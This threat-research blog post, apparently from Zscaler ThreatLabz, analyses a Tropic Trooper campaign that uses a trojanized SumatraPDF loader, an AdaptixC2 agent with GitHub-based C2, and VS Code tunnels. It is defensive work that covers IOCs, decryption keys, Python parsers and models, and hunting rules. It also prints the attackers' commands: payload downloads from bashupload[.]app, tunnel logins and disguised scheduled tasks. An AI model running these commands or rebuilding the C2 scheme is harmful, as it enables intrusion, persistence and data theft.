Introduction

On March 12, 2026, Zscaler ThreatLabz discovered a malicious ZIP archive containing military-themed document lures targeting Chinese-speaking individuals. Our analysis of this sample uncovered a campaign leveraging a multi-stage attack chain in which a trojanized SumatraPDF reader deploys an AdaptixC2 Beacon agent, ultimately leading to the download and abuse of Visual Studio (VS) Code tunnels for remote access. During our analysis, we observed that the threat actor likely targeted Chinese-speaking individuals in Taiwan, as well as individuals in South Korea and Japan. Based on the tactics, techniques, and procedures (TTPs) observed in this attack, ThreatLabz attributes this activity to Tropic Trooper (also known as Earth Centaur and Pirate Panda) with high confidence.

In this blog post, ThreatLabz covers the Tropic Trooper campaign and the tools that were deployed to conduct intelligence gathering.

Key Takeaways

- On March 12, 2026, ThreatLabz discovered a malicious ZIP archive containing military-themed document lures targeting Chinese-speaking individuals.
- The campaign used a trojanized SumatraPDF binary to deploy an AdaptixC2 Beacon and ultimately VS Code on targeted machines.
- The shellcode loader used in this attack closely resembles the TOSHIS loader, which has been associated with Tropic Trooper and was previously reported in the TAOTH campaign.
- The threat actors created a custom AdaptixC2 Beacon listener, leveraging GitHub as their command-and-control (C2) platform.
- The staging server involved in this attack also hosted a Cobalt Strike Beacon and an EntryShell backdoor. Both malware families and their configurations are known to have been used by Tropic Trooper.

Technical Analysis

In the sections below, ThreatLabz outlines the attack chain, starting with military-themed lures and leading to the deployment of the AdaptixC2 Beacon agent.
We also discuss the use of a custom GitHub listener and the recurring TTP of abusing VS Code for remote access.

Attack chain

The full sequence of the attack is illustrated in the figure below.

Figure 1: Tropic Trooper attack chain leading to the deployment of an AdaptixC2 Beacon and VS Code tunnels.

The ZIP archive contained documents with the following names, roughly translated to English:

Original Chinese Filename | English Translation
--- | ---
CECC昆山元宇宙产业基地建设方案(20230325).docx | CECC Kunshan Metaverse Industrial Base Construction Plan (20230325).docx
中国声学智能产业声创中心建设和运营方案(2021112)(2)(1)(1).docx | China Acoustic Intelligence Industry Innovation Center Construction and Operation Plan (2021112)(2)(1)(1).docx
武器装备体系结构贡献度评估.pdf | Assessment of Contribution Degree of Weaponry System Architecture.pdf
武器装备体系能力贡献度的解析与度量方法.pdf | Analysis and Measurement Methods for Capability Contribution of Weaponry Systems.pdf
江苏自主智能无人系统产业基地建设方案(202304) .docx | Jiangsu Autonomous Intelligent Unmanned Systems Industrial Base Construction Plan (202304).docx
美英与美澳核潜艇合作的比较分析(2025).exe | Comparative Analysis of US-UK and US-Australia Nuclear Submarine Cooperation (2025).exe

Table 1: The files found inside the ZIP archive, showing each original Chinese filename alongside its approximate English translation.

Most of these files appear outdated. The document that appears to be the most recent, Comparative Analysis of US-UK and US-Australia Nuclear Submarine Cooperation (2025).exe, is actually a trojanized version of the SumatraPDF reader binary. When executed, this loader triggers a multi-stage attack: it downloads and displays a new decoy PDF to the victim while discreetly downloading and running an AdaptixC2 Beacon agent in the background.

The downloaded lure PDF aligns with its file name, featuring analysis and visuals concerning American submarines and the AUKUS partnership (a security partnership between Australia, the U.K., and the U.S.).
The figure below illustrates the contents of the downloaded lure PDF.

Figure 2: Tropic Trooper PDF lure containing information about the AUKUS partnership and American submarines.

Stage 1 - TOSHIS loader (backdoored SumatraPDF)

At first glance, the trojanized executable resembles the open-source SumatraPDF reader, carrying the same certificate and PDB path as the legitimate SumatraPDF executable. However, the Authenticode signature of this binary no longer validates, because the file was modified after signing to embed the TOSHIS loader. Analysis shows that the threat actor hijacks the executable's control flow by redirecting the __security_init_cookie function to execute malicious code. Earlier TOSHIS loader samples modified the entry point to jump to the payload; this version uses a revised trojanization method that instead overwrites __security_init_cookie, the /GS stack-cookie initializer that the MSVC CRT startup stub calls before main(), so the malicious code runs before any of SumatraPDF's own logic while the original entry point stays untouched.

Figure 3: Comparison of the entry points in the trojanized and legitimate SumatraPDF versions.

The InjectedCode function redirects to the TOSHIS loader code. The function begins by constructing stack strings, which include the command-and-control (C2) IP address, the destination path for the lure file, DLL names, and a cryptographic key. Next, the TOSHIS loader resolves the APIs it needs by comparing Adler-32 hashes of export names. The loader then downloads the PDF decoy from 158.247.193[.]100 and opens it using ShellExecuteW. TOSHIS loader then retrieves a second-stage shellcode from the same IP address, decrypts it using AES-128 CBC via the WinCrypt (CryptoAPI) functions, and executes the shellcode directly in memory. This shellcode is an AdaptixC2 Beacon agent, a departure from earlier TOSHIS versions, which delivered either a Cobalt Strike Beacon or a Mythic Merlin agent.

ANALYST NOTE: The AES key is derived using the Windows API function CryptDeriveKey with the MD5 hash of the hard-coded key seed "424986c3a4fddcb6".
The initialization vector (IV) is set to all zero bytes.

An analysis of the InjectedCode function shows that it is largely identical to the TOSHIS loader described in Trend Micro's TAOTH report. The only notable differences are modifications to the stack strings and the removal of the language ID check. Although this sample resolves the GetSystemDefaultLangID API, the API is never actually invoked. Clear similarities can be observed between the injected code in the two samples, such as the use of the same User-Agent and a similar .dat file extension, as shown in the code comparison below.

Figure 4: Code comparison of the TOSHIS loader in the backdoored SumatraPDF sample and the TOSHIS loader described in the TAOTH report.

Stage 2 - Backdoor: AdaptixC2 Beacon agent integrated with GitHub

The second-stage backdoor employed in this attack is the open-source AdaptixC2 Beacon agent, which incorporates a customized Beacon listener. The table below shows the extracted configuration:

Offset | Field | Value
--- | --- | ---
Config Meta | |
0x00 | Extra field | 0x6a (106)
0x04 | Profile size | 156 bytes (encrypted)
Decrypted Profile | |
0x08 | Agent type (wmark) | 0xbe4c0149
GitHub Transport Config | |
0x0C | Repo owner | cvaS23uchsahs
0x1E | Repo name | rss
0x26 | API host | api.github.com
0x39 | Auth token | ghp_…
0x66 | Issues API path | repos/cvaS23uchsahs/rss/issues?state=open
Timing Config | |
0x94 | Kill date | disabled
0x98 | Working time | disabled (always active)
0x9C | Sleep delay | 60 seconds
0xA0 | Jitter | 42
RC4 Key | |
0xA4 | RC4 key | 7adf76418856966effc9ccf8a21d1b12

Table 2: Configuration extracted from a Tropic Trooper AdaptixC2 Beacon agent.

The RC4 key at offset 0xA4 is used to decrypt the encrypted profile (the 156 bytes starting at offset 0x08, ending exactly where the key begins) as well as beacon heartbeats. Note that the GitHub auth token is hard-coded in this profile and shipped inside every agent, so anyone who extracts it from a sample has the same access to the repository as the agents themselves. Because the agent itself is open source, our focus is on the custom Beacon listener component, which uses GitHub as its C2 server.
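The configuration layout in Table 2, as a worked parser. This is an added example written for this analysis, not the agent's source code or Zscaler's tooling. Its string encoding (a 4-byte little-endian length covering the bytes plus a trailing NUL) is an assumption inferred from the offset arithmetic in the table: 0x0C + 4 + len("cvaS23uchsahs") + 1 = 0x1E, and the same holds for every string field through 0x94. The numeric fields are assumed to be 4-byte little-endian integers, the RC4 key is read as the 16 bytes the hex string denotes, and the auth token value is a placeholder. The sample blob is constructed here from the table values so the parser runs offline.

```python
"""Parse an AdaptixC2 Beacon config laid out as in Table 2 (added example).
Layout assumed from the table: [u32 extra][u32 profile_size][RC4-encrypted
profile of profile_size bytes][16-byte RC4 key]; strings inside the profile
are [u32 length incl. NUL][bytes][NUL]; other fields are u32 little-endian."""
import struct

PROFILE_OFFSET = 0x08          # profile starts here (Table 2)
RC4_KEY_LEN = 16               # key follows the profile at 0x08 + profile_size


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); the same call encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def _pack_str(value: str) -> bytes:
    raw = value.encode()
    return struct.pack("<I", len(raw) + 1) + raw + b"\x00"


def build_sample_config(rc4_key: bytes, token: str) -> bytes:
    """Constructed test blob using the Table 2 values (token is a placeholder)."""
    profile = struct.pack("<I", 0xBE4C0149)                     # 0x08 agent type
    profile += _pack_str("cvaS23uchsahs")                        # 0x0C repo owner
    profile += _pack_str("rss")                                  # 0x1E repo name
    profile += _pack_str("api.github.com")                       # 0x26 API host
    profile += _pack_str(token)                                  # 0x39 auth token (40 chars)
    profile += _pack_str("repos/cvaS23uchsahs/rss/issues?state=open")  # 0x66 issues path
    profile += struct.pack("<IIII", 0, 0, 60, 42)                # 0x94 kill date, working time, sleep, jitter
    assert len(profile) == 156                                   # "Profile size" in Table 2
    header = struct.pack("<II", 0x6A, len(profile))              # 0x00 extra field, 0x04 profile size
    return header + rc4(rc4_key, profile) + rc4_key


def parse_config(blob: bytes) -> dict:
    """Decrypt and parse a config blob; raises ValueError instead of over-reading."""
    if len(blob) < PROFILE_OFFSET + RC4_KEY_LEN:
        raise ValueError("blob too short for header and key")
    extra, size = struct.unpack_from("<II", blob, 0)
    end = PROFILE_OFFSET + size
    if len(blob) < end + RC4_KEY_LEN:
        raise ValueError("profile size exceeds blob")
    key = blob[end:end + RC4_KEY_LEN]
    profile = rc4(key, blob[PROFILE_OFFSET:end])
    pos = 0

    def read_u32() -> int:
        nonlocal pos
        (value,) = struct.unpack_from("<I", profile, pos)
        pos += 4
        return value

    def read_str() -> str:
        nonlocal pos
        length = read_u32()
        value = profile[pos:pos + length].rstrip(b"\x00").decode()
        pos += length
        return value

    cfg = {"extra": extra, "profile_size": size, "agent_type": read_u32()}
    for name in ("repo_owner", "repo_name", "api_host", "auth_token", "issues_path"):
        cfg[name] = read_str()
    cfg["kill_date"], cfg["working_time"] = read_u32(), read_u32()
    cfg["sleep"], cfg["jitter"] = read_u32(), read_u32()
    cfg["rc4_key"] = key.hex()
    return cfg


if __name__ == "__main__":
    key = bytes.fromhex("7adf76418856966effc9ccf8a21d1b12")   # RC4 key from Table 2
    sample = build_sample_config(key, "ghp_" + "0" * 36)      # placeholder token, not the real one
    for field, value in parse_config(sample).items():
        print(f"{field:13s} {value}")
```

The length checks matter when pointing the parser at a memory dump rather than a clean blob: a corrupted profile size would otherwise walk the decryptor off the end of the buffer. The same offset arithmetic is a quick sanity check on an extracted config, since the 156-byte size at 0x04 has to put the key exactly at 0xA4.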
The figure below shows the layout of the GitHub repository used for C2.

Figure 5: Layout of the Tropic Trooper GitHub repository used by an AdaptixC2 Beacon.

The figure below shows the details of GitHub issues used for C2.

Figure 6: Example of GitHub issues used by AdaptixC2.

The agent starts by generating a 16-byte RC4 session key using RtlRandomEx(GetTickCount()) to encrypt all subsequent C2 traffic, which is standard practice for an AdaptixC2 agent. (RtlRandomEx is a deterministic generator, so a key seeded only by the 32-bit tick count has far less entropy than its 16 bytes suggest; in any case the key is recoverable from the beacon by anyone holding the config key, as described below.) However, this custom listener differs from the typical AdaptixC2 HTTP/TCP listeners in that the server cannot learn the agent's external IP address, since all traffic terminates at GitHub. As a result, the agent retrieves its external IP address by sending a request to ipinfo.io. This external IP address is then included in every beacon sent back to the C2. The agent uses the following HTTP request to retrieve its external IP address from ipinfo.io:

GET /ip HTTP/1.1
User-Agent: curl/8.5.0 // Hardcoded user agent
Host: ipinfo.io
Cache-Control: no-cache

The agent then sends a beacon to the C2 by performing a POST request to GitHub issue #1 to establish a session. The beacon follows the standard AdaptixC2 format, containing the RC4 session key and a random 4-byte number used as the agent ID. These values are RC4 encrypted using the key from the agent's config. Note that the agent ID is regenerated each time the agent is initialized. The agent uses this ID to identify and process commands specifically intended for it. The following figure shows the C2 workflow:

Figure 7: Diagram showing the C2 workflow.

After beaconing, the agent checks for tasks to be executed by making the following request:

GET /repos/cvaS23uchsahs/rss/issues?state=open HTTP/1.1

The API returns a JSON list of open issues, and the agent uses substring matching, rather than a full JSON parser, to extract the number, title, and body fields of each issue. Depending on the issue title, the agent applies different logic to extract the actual task, which is RC4 encrypted with the session key.

The agent processes each issue as follows:

- If the title is "beat": this is the heartbeat/beacon issue, and the agent skips it.
- If the title starts with "upload" and ends with ".txt": the agent finds the last "_" character in the title, expecting an 8-character hexadecimal agent ID between that "_" and the ".txt" extension. If the extracted ID matches the agent's own ID, the agent continues processing the issue; if it does not match, the agent skips the issue. There are, however, some unusual edge cases: the agent will also process the issue if there is no "_" character in the title at all, or if the extracted ID is fewer than 7 characters long. If the agent decides to process the issue, it constructs the contents API URL.
  For example: /repos/{repo_owner}/{repo_name}/contents/upload/{agent_id}/{issue_title}, i.e. /repos/cvaS23uchsahs/rss/contents/upload/c64df0d5/upload_1773341382_c64df0d5.txt. The agent then extracts the download URL from the response, again using substring matching, downloads the file from the repository, decodes its Base64-encoded contents, and queues the task for processing.
- If the title starts with "fileupload": the agent extracts and Base64 decodes the "body" field, and queues the task for processing. This encrypted task contains the path of the file the agent should exfiltrate. Note that there is no agent ID check here, so every agent will attempt to execute this task.
- If the title does not start with any of the three strings above: the agent Base64 decodes the title itself and queues it as a command for processing. Again, there is no agent ID check, so every agent attempts to execute this task.

The agent then proceeds to process all queued tasks. Each task in the queue is decrypted using the RC4 session key and processed according to the standard AdaptixC2 agent procedure.

After processing the tasks, the agent prepares a response payload. The response consists of two parts: the encrypted beacon packet sent previously (RC4 encrypted with the key from the agent's config), and the AdaptixC2 agent data packet encrypted with the session key. The entire buffer is Base64-encoded, and the agent uploads it as a file to GitHub. If the buffer is larger than 30MB, it is uploaded in 30MB chunks, each with an incrementing part number. An example of an upload request is shown below.

PUT /repos/cvaS23uchsahs/rss/contents/download/fa302eb5/download_1773890673_part1.txt HTTP/1.1
// ...
Body: {"message":"upload","content":"<base64 blob>"}

Once the file is successfully uploaded, the agent adds a comment to the issue containing the command to which it is responding. The "|@@@|" string is used as a token to separate the fields of the comment (the agent ID and the file part names), as shown below.

POST /repos/cvaS23uchsahs/rss/issues/2/comments HTTP/1.1
// ...
Body: {"body":"fa302eb5|@@@|download_1773890673_part1.txt"}

Stage 3 - Operations and operational security

By monitoring the C2 communication flow through the GitHub repository, ThreatLabz noticed that beacons are deleted very quickly, often within 10 seconds of being uploaded. This rapid deletion is likely intended to destroy the session keys and prevent observers from decrypting the C2 messages.

During our observation of this campaign, ThreatLabz found that the threat actor primarily used the Adaptix agent as an initial foothold for reconnaissance and access. When a victim was deemed "interesting," the threat actor deployed VS Code and used VS Code tunnels for remote access. On some machines, the threat actor installed alternative trojanized applications, possibly to better camouflage their activity among the applications the victim normally uses.

ThreatLabz observed the threat actor issuing the following commands:

arp /a
cd C:\Users\Public\Documents & code tunnel user login --provider github > z.txt
code tunnel user login --provider github > z.txt
curl -O http://bashupload[.]app/6e1lhc
curl -kJL https://code.visualstudio.com/sha/download?build=stable&os=cli-win32-x64 -o %localappdata%\microsoft\windows\Burn\v.zip
curl -s 'ip.me?t=1&m=2'
curl http://bashupload[.]app/zgel2a.bin -o v.zip & dir
curl ip.me?t=1&m=2
net view \\192.168.220.2
schtasks /create /tn \MSDNSvc /sc hourly /mo 2 /tr C:\users\public\documents\dsn.exe /f /RL HIGHEST
schtasks /create /tn \MicrosoftUDN /sc hourly /mo 2 /f /tr C:\Users\Public\Documents\MicrosoftCompilers.exe C:\Users\Public\Documents\2.library-ms
tasklist | findstr /i note
tasklist|findstr /i code.exe || code tunnel user login --provider github > z2.txt
timeout 3 && schtasks /run /i /tn \MicrosoftUDN
wmic process where processid=8528 get commandline

A few of these commands are worth calling out. "code tunnel user login --provider github > z.txt" captures the device-login URL and code that the VS Code CLI prints to stdout, so the operator can read them back through the C2 and complete the GitHub login from their own browser; the variant guarded by "tasklist|findstr /i code.exe ||" only repeats the login when VS Code is not already running. Both schtasks commands create tasks that run every two hours, placed at the root of the task scheduler tree with Microsoft-sounding names and pointing at executables under C:\Users\Public\Documents, and the MSDNSvc task requests the highest run level (/RL HIGHEST).

Further monitoring of the staging server, 158.247.193[.]100, revealed that it also hosted the EntryShell backdoor, a custom backdoor known to be used by Tropic Trooper.
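Returning to the GitHub listener described in Stage 2, the issue-title dispatch rules (including the two edge cases noted there) and the response upload format, as an added example. This is a model written for this post, not the agent's own code or Zscaler's. Assumptions beyond what the analysis states: the chunk size is taken as 30 * 1024 * 1024 characters of the Base64 text, the number in a part name is a Unix timestamp, and a multi-part comment joins the part names with "|@@@|" (only a single-part comment is shown above). The repository owner and name come from Table 2.

```python
"""Agent-side model of the custom GitHub listener (added example)."""
import base64
import json

SEP = "|@@@|"
CHUNK = 30 * 1024 * 1024                 # assumed: 30 MB of Base64 text per part
OWNER, REPO = "cvaS23uchsahs", "rss"     # from Table 2


def classify_issue(title: str, agent_id: str) -> dict:
    """Decide what an agent with the given 8-hex-char ID does with one open issue."""
    if title == "beat":
        return {"action": "skip", "reason": "heartbeat issue"}
    if title.startswith("fileupload"):
        # No agent-ID check: every agent attempts the exfiltration task in the body.
        return {"action": "fileupload", "task_source": "body"}
    if title.startswith("upload") and title.endswith(".txt"):
        us = title.rfind("_")
        extracted = "" if us < 0 else title[us + 1:-len(".txt")]
        # Edge cases from the analysis: a title with no "_" at all, or an extracted
        # ID shorter than 7 characters, is processed instead of being rejected.
        if us >= 0 and len(extracted) >= 7 and extracted != agent_id:
            return {"action": "skip", "reason": f"addressed to {extracted}"}
        return {"action": "upload", "task_source": "file",
                "contents_url": f"/repos/{OWNER}/{REPO}/contents/upload/{agent_id}/{title}"}
    # Any other title is itself the Base64-encoded task, again with no ID check.
    return {"action": "command", "task_source": "title"}


def build_response(agent_id: str, payload: bytes, ts: int, chunk: int = CHUNK) -> list:
    """Base64 the response buffer (beacon packet + data packet, already encrypted
    by the caller), split it into parts and return the PUT path and JSON body
    for each part as sent to the GitHub contents API."""
    blob = base64.b64encode(payload).decode()
    parts = [blob[i:i + chunk] for i in range(0, len(blob), chunk)] or [""]
    uploads = []
    for n, part in enumerate(parts, 1):
        name = f"download_{ts}_part{n}.txt"
        uploads.append({
            "name": name,
            "path": f"/repos/{OWNER}/{REPO}/contents/download/{agent_id}/{name}",
            "body": json.dumps({"message": "upload", "content": part}),
        })
    return uploads


def build_comment(agent_id: str, part_names: list) -> str:
    """JSON body of the comment posted to the task issue once the parts are up."""
    return json.dumps({"body": SEP.join([agent_id, *part_names])})


if __name__ == "__main__":
    me = "c64df0d5"
    for t in ("beat", "upload_1773341382_c64df0d5.txt", "upload_1773341382_fa302eb5.txt",
              "upload.txt", "upload_abc.txt", "fileupload", "d2hvYW1p"):
        print(f"{t:34s} -> {classify_issue(t, me)}")
    ups = build_response("fa302eb5", b"constructed response bytes", 1773890673)
    print(ups[0]["path"])
    print(build_comment("fa302eb5", [u["name"] for u in ups]))
```

Two properties of the real agent fall out of the model: a task whose title lacks the agent ID, or carries a short one, is executed by every agent that polls the repository, and the response parts are addressed by a path that embeds the agent ID, which is why the comment format needs nothing more than the ID and the part names.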
This sample of EntryShell used the same AES-128 ECB key (afkngaikfaf) as previously reported. Additionally, the staging server was also found to host a Cobalt Strike Beacon marked with the watermark "520", another known indicator of Tropic Trooper activity.

Threat Attribution

ThreatLabz attributes this attack to Tropic Trooper with high confidence based on the following factors:

- Use of TOSHIS: The loader used in this campaign matches the loader identified as TOSHIS in the TAOTH campaign.
- Trojanized binaries: The technique of using trojanized binaries (such as SumatraPDF) as part of the initial infection vector is consistent across both campaigns. In this campaign, a trojanized SunloginDesktopAgent.exe was also observed as part of a secondary infection.
- Publicly available backdoors: As in the TAOTH campaign, publicly available backdoors are used as payloads. While Cobalt Strike Beacon and Mythic Merlin were used previously, the threat actor has now shifted to AdaptixC2.
- Use of VS Code: In both campaigns, the threat actor deployed VS Code to establish a tunnel.
- Post-infection commands: The commands executed in this attack are similar to those reported in the TAOTH campaign, particularly the use of "z.txt" when creating a VS Code tunnel.
- Hosting of the EntryShell backdoor: The EntryShell backdoor, a custom backdoor previously linked to Tropic Trooper, was also hosted on the staging server.
- Cobalt Strike Beacon: The Cobalt Strike Beacon with the watermark "520" is a known signature of Tropic Trooper. Additionally, it used C2 URIs such as "/Originate/contacts/CX4YJ5JI7RZ", which were also observed in earlier attacks attributed to Tropic Trooper.

Conclusion

This campaign, attributed to Tropic Trooper, targeted Chinese-speaking individuals in Taiwan, as well as individuals in South Korea and Japan. ThreatLabz was able to make this attribution with high confidence based on the threat actor's use of the TOSHIS loader and similar TTPs.
For this campaign, Tropic Trooper deployed an AdaptixC2 Beacon agent with a custom GitHub-based C2 listener, which was in turn used to deploy VS Code tunnels for remote access.

Zscaler Coverage

Zscaler's multilayered cloud security platform detects indicators related to TOSHIS at various levels. The figure below depicts the Zscaler Cloud Sandbox, showing detection details for TOSHIS.

Figure 8: Zscaler Cloud Sandbox report for TOSHIS loader.

In addition to sandbox detections, Zscaler's multilayered cloud security platform detects indicators related to the targeted attacks mentioned in this blog at various levels with the following threat names:

- Win64.Trojan.TOSHIS
- Win32.Backdoor.AdaptixC2
- Win32.Backdoor.EntryShell
- Win32.Backdoor.CobaltStrike

Indicators Of Compromise (IOCs)

File indicators

MD5 | SHA1 | SHA256 | Filename | Description
--- | --- | --- | --- | ---
3238d2f6b9ea9825eb61ae5e80e7365c | 2c65433696037f4ce0f8c9a1d78bdd6835c1b94d | a4f2131eb497afe5f78d8d6e534df2b8d75c5b9b565c3ec17a323afe5355da26 | Unknown | ZIP archive containing lures and trojanized SumatraPDF
67fcf5c21474d314aa0b27b0ce8befb2 | 19e3c4df728e3e657cb9496cd4aaf69648470b63 | 47c7ce0e3816647b23bb180725c7233e505f61c35e7776d47fd448009e887857 | 资料/美英与美澳核潜艇合作的比较分析(2025).exe | Trojanized SumatraPDF
89daa54fada8798c5f4e21738c8ea0b4 | bd618c9e1e10891fe666839650fa406833d70afd | aeec65bac035789073b567753284b64ce0b95bbae62cf79e1479714238af0eb7 | 4d.dat | Encrypted reflective loader shellcode and AdaptixC2 Beacon agent
e2dc48ef24da000b8fc1354fa31ca9ae | 6c68dc2e33780e07596c3c06aa819ea460b3d125 | 7a95ce0b5f201d9880a6844a1db69aac7d1a0bf1c88f85989264caf6c82c6001 | N/A | Decrypted AdaptixC2 Beacon agent DLL
2d7cc3646c287d6355def362916c6d26 | adb47733c224fc8c0f7edc61becb578e560435ab | 3936f522f187f8f67dda3dc88abfd170f6ba873af81fc31bbf1fdbcad1b2a7fb | 1C.dat | Encrypted Cobalt Strike Beacon loader
71fa755b6ba012e1713c9101c7329f8d | c2051635ccfdc0b48c260e7ceeee3f96bf026fea | 6eaea92394e115cd6d5bab9ae1c6d088806229aae320e6c519c2d2210dbc94fe | 2C.dat | Encrypted Cobalt Strike Beacon loader
c620b4671a5715eec0e9f3b93e6532ba | 343be0f2077901ea5b5b9fb97d97892ac1a907e6 | b92a3a1cf5786b6e08643483387b77640cd44f84df1169dd00efde7af46b5714 | N/A | Decrypted Cobalt Strike Beacon loader
9a69b717ec4e8a35ae595aa6762d3c27 | 401cc16d79d94c32da3f66df21d66ffd71603c14 | 3c29c72a59133dd9eb23953211129fd8275a11b91a3b8dddb3c6e502b6b63edb | N/A | Decrypted Cobalt Strike Beacon loader

Network indicators

Type | Indicator
--- | ---
IP Address | 158.247.193[.]100
URL | https://api.github.com/repos/cvaS23uchsahs/rss/issues
URL | https://47.76.236[.]58:4430/Originate/contacts/CX4YJ5JI7RZ
URL | https://47.76.236[.]58:4430/Divide/developement/GIZWQVCLF
URL | https://stg.lsmartv[.]com:8443/Originate/contacts/CX4YJ5JI7RZ
URL | https://stg.lsmartv[.]com:8443/Divide/developement/GIZWQVCLF

MITRE ATT&CK Framework

ID | Tactic, Technique | Description
--- | --- | ---
T1585.003 | Resource Development: Establish Accounts: Cloud Accounts | The threat actor created the GitHub account cvaS23uchsahs, which hosted the rss repository used for C2 communication.
T1587.001 | Resource Development: Develop Capabilities: Malware | The threat actor developed a custom listener for the AdaptixC2 Beacon agent that used the GitHub API for C2 communication. In addition, the threat actor developed their own custom TOSHIS loader.
T1588.001 | Resource Development: Obtain Capabilities: Malware | The threat actor obtained and deployed the open-source AdaptixC2 Beacon agent as their backdoor.
T1588.002 | Resource Development: Obtain Capabilities: Tool | The threat actor used VS Code's tunnel feature for remote access to compromised systems.
T1608.001 | Resource Development: Stage Capabilities: Upload Malware | The threat actor hosted a second-stage shellcode payload on their server at 158.247.193[.]100, which the initial loader was designed to download and execute.
T1608.002 | Resource Development: Stage Capabilities: Upload Tool | The threat actor uploaded VS Code to bashupload[.]app, from which it was subsequently downloaded onto victim machines.
T1204.002 | Execution: User Execution: Malicious File | The attack sequence requires a user to run the malicious file titled "美英与美澳核潜艇合作的比较分析(2025).exe".
T1106 | Execution: Native API | The initial loader used WinCrypt cryptographic functions to decrypt the second-stage shellcode. Additionally, it employed the ShellExecuteW API to launch the decoy PDF document.
T1059.003 | Execution: Command and Scripting Interpreter: Windows Command Shell | The threat actor used the Windows Command Shell to run several reconnaissance commands (e.g., arp, net view, tasklist) and to download VS Code with cURL.
T1053.005 | Persistence: Scheduled Task/Job: Scheduled Task | The threat actor created scheduled tasks using schtasks /create to execute the AdaptixC2 agent every two hours for persistence.
T1036.001 | Defense Evasion: Masquerading: Invalid Code Signature | The threat actor used a trojanized SumatraPDF executable that still carries the original SumatraPDF signature, although the signature no longer validates.
T1036.004 | Defense Evasion: Masquerading: Masquerade Task or Service | The threat actor created scheduled tasks with names intended to blend in with legitimate system tasks, such as \MSDNSvc and \MicrosoftUDN.
T1620 | Defense Evasion: Reflective Code Loading | The trojanized SumatraPDF loader downloaded a second-stage shellcode from 158.247.193[.]100, which reflectively loads the AdaptixC2 Beacon agent.
T1027.007 | Defense Evasion: Obfuscated Files or Information: Dynamic API Resolution | The initial loader identified Windows APIs by comparing Adler-32 hashes of their names.
T1027.013 | Defense Evasion: Obfuscated Files or Information: Encrypted/Encoded File | The initial loader downloaded a second-stage payload and decrypted the shellcode in memory using AES-128.
T1127 | Defense Evasion: Trusted Developer Utilities Proxy Execution | The threat actor downloaded Roslyn, the open-source .NET compiler, to compile and execute malicious code.
T1016 | Discovery: System Network Configuration Discovery | The threat actor ran the command arp /a to retrieve the local ARP table. The threat actor also sent requests to ipinfo.io to identify the external IP address of compromised machines.
T1005 | Collection: Data from Local System | The threat actor used the AdaptixC2 Beacon agent's fileupload feature to exfiltrate files from infected machines.
T1071.001 | Command and Control: Application Layer Protocol: Web Protocols | The TOSHIS loader downloaded a decoy PDF and a second-stage shellcode payload over HTTP from 158.247.193[.]100. The AdaptixC2 Beacon agent used HTTPS to communicate with its GitHub C2.
T1102.002 | Command and Control: Web Service: Bidirectional Communication | The threat actor used GitHub for bidirectional C2 communication.
T1219.001 | Command and Control: Remote Access Tools: IDE Tunneling | The threat actor deployed VS Code and used its remote tunneling feature for interactive access.
T1105 | Command and Control: Ingress Tool Transfer | The threat actor used cURL to retrieve tools from external servers onto compromised systems, including the VS Code CLI from https://code.visualstudio.com and additional payloads from http://bashupload[.]app.
T1132.001 | Command and Control: Data Encoding: Standard Encoding | The threat actor used Base64 to encode the RC4-encrypted C2 messages carried in GitHub issues, comments, and repository files.
T1573.001 | Command and Control: Encrypted Channel: Symmetric Cryptography | The AdaptixC2 Beacon agent encrypted its C2 traffic using an RC4 session key.
T1573.002 | Command and Control: Encrypted Channel: Asymmetric Cryptography | The threat actor used the GitHub API for C2, which communicates over HTTPS.
T1567.001 | Exfiltration: Exfiltration Over Web Service: Exfiltration to Code Repository | The threat actor used the GitHub API to exfiltrate files to a threat actor-controlled code repository.
T1041 | Exfiltration: Exfiltration Over C2 Channel | The threat actor exfiltrated data over the same channel used for C2 communication.
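The command lines from Stage 3 and the ATT&CK mapping above, turned into hunting logic over process-creation records. This is an added example, not Zscaler's detection content. The records are constructed for the example; their field names follow the Sysmon Event ID 1 shape (Image, ParentImage, CommandLine), and the indicators appear undefanged, as they would in real telemetry. The rules key on the observed tradecraft rather than on the specific file names, so they generalise to the same behaviour under other names: the VS Code tunnel login, the VS Code CLI fetched with curl, downloads from bashupload.app, external IP lookups, scheduled tasks pointing into C:\Users\Public, Microsoft-looking task names at the root of the task tree, and the tasklist/wmic process discovery.

```python
"""Hunting rules for the Stage 3 post-exploitation commands (added example)."""
import re

# (rule label with the ATT&CK ID it supports, regex applied to the command line)
RULES = [
    ("T1219.001 VS Code tunnel login",
     re.compile(r"\bcode(\.exe)?\s+tunnel\b", re.I)),
    ("T1105 VS Code CLI fetched with curl",
     re.compile(r"code\.visualstudio\.com/sha/download\?.*os=cli-win32", re.I)),
    ("T1105 download from bashupload.app",
     re.compile(r"bashupload\.app", re.I)),
    ("T1016 external IP lookup (ip.me / ipinfo.io)",
     re.compile(r"\b(ip\.me|ipinfo\.io)\b", re.I)),
    ("T1053.005 scheduled task pointing into C:\\Users\\Public",
     re.compile(r"schtasks\s+/create\b.*\s/tr\s+\"?C:\\Users\\Public\\", re.I)),
    ("T1036.004 Microsoft-looking task name at the root of the task tree",
     re.compile(r"schtasks\s+/create\b.*\s/tn\s+\\(MS|Microsoft)\w*", re.I)),
    ("T1057 process discovery (tasklist|findstr, wmic process)",
     re.compile(r"tasklist\s*\|\s*findstr|wmic\s+process\s+where", re.I)),
]

# Constructed records: the observed command lines under a parent living in
# C:\Users\Public (as the scheduled tasks would run it), plus benign noise.
_AGENT = r"C:\Users\Public\Documents\dsn.exe"
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": _AGENT,
     "CommandLine": r"cmd /c arp /a"},
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": _AGENT,
     "CommandLine": r"cmd /c cd C:\Users\Public\Documents & code tunnel user login --provider github > z.txt"},
    {"Image": r"C:\Windows\System32\curl.exe", "ParentImage": _AGENT,
     "CommandLine": r"curl -kJL https://code.visualstudio.com/sha/download?build=stable&os=cli-win32-x64 -o %localappdata%\microsoft\windows\Burn\v.zip"},
    {"Image": r"C:\Windows\System32\curl.exe", "ParentImage": _AGENT,
     "CommandLine": r"curl http://bashupload.app/zgel2a.bin -o v.zip"},
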